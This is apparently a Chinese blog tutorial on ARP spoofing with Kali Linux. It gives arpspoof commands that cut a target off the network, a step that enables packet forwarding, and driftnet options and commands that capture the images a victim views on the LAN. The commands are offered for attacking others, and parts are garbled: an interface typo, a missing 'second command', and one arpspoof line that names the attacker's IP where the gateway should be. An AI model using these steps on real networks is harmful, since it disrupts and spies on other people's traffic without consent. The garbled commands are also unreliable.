需要配合linux Kali滲透測試平台
關于arp欺騙的原理可以參考我以前寫的文章,有興趣的可以去了解一下,這裡就不做詳解了
點這裡傳送過去
直接上代碼
arpspoof -i ech0(網卡) -t 目标機ip 本地區域網路關 //單向的arp欺騙,可以讓目标單純的斷網 不來流量轉發目标機會斷網
如果隻是攻擊的話,大可隻用第二條指令讓對方斷網
不過arp欺騙可不單單隻有令對方斷網這麼簡單,arp的作用可多着去了,下面給大家介紹這款配合arp欺騙的工具
廢話不多說,直接上教程
一.driftnet
driftnet 主要用來嗅探被arp欺騙後的主機所流量的圖檔
常用指令:
-b :捕獲到新的圖檔時發出提示聲
-i interface :選擇要監聽的網卡
-p :不讓所監聽的接口使用混雜模式
-a :背景模式:将捕獲的圖檔儲存到目錄中(不會顯示在螢幕上)
-m number :指定儲存圖檔數的數目
-d directory :指定儲存圖檔的路徑
-x prefix :指定儲存圖檔的字首名
1.開啟資料流量轉發:
因為Kali為了系統安全,是以預設關閉了這個選項,可以到Kali中檢視/proc/sys/net/ipv4/ip_forward,該檔案内容預設為0,即禁止資料包轉發, 可以通過echo 1 > /proc/sys/net/ipv4/ip_forward
來開啟流量轉發,不然靶機會斷網!!!
攻擊指令
arpspoof -i eth0 -t 靶機ip 攻擊機ip
ARP欺騙成功後,通過driftnet指令來擷取内網單機浏覽的圖檔:
driftnet -i eth0
成功嗅探顯示浏覽器上的圖檔